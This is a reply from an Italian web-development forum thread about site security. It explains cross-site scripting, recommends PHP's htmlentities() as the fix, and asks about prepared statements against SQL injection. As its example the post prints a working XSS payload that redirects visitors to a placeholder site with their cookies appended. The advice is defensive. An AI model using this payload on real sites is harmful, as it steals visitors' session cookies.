Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Visualizzazione dei risultati da 1 a 9 su 9

Discussione: Sicurezza

Visualizzazione discussione

  1. 20-08-2016, 16:59 #4
    camionistaxcaso
    camionistaxcaso non è in linea
    Utente di HTML.it
    Registrato dal
    Oct 2011
    Messaggi
    1,001
    Si chiama cross site scripting (abbreviato xss), mi basta inserire questo codice per ricevere nel mio sito dati sensibili inseriti nei cookie di chi visiterà il tuo sito
    codice:
    <script>
document.location='http://www.miosito.com/pagina.php?cookies='+
document.cookie;
</script>

    Risolvi con la funzione htmlentities() che trasforma i caratteri che il browser interpreta come codice
    http://php.net/manual/en/function.htmlentities.php

    Per quanto riguarda l' sql injection usi i prepared statement ?
    Ultima modifica di camionistaxcaso; 20-08-2016 a 17:02
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Tag per questa discussione

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2026 vBulletin Solutions, Inc. All rights reserved.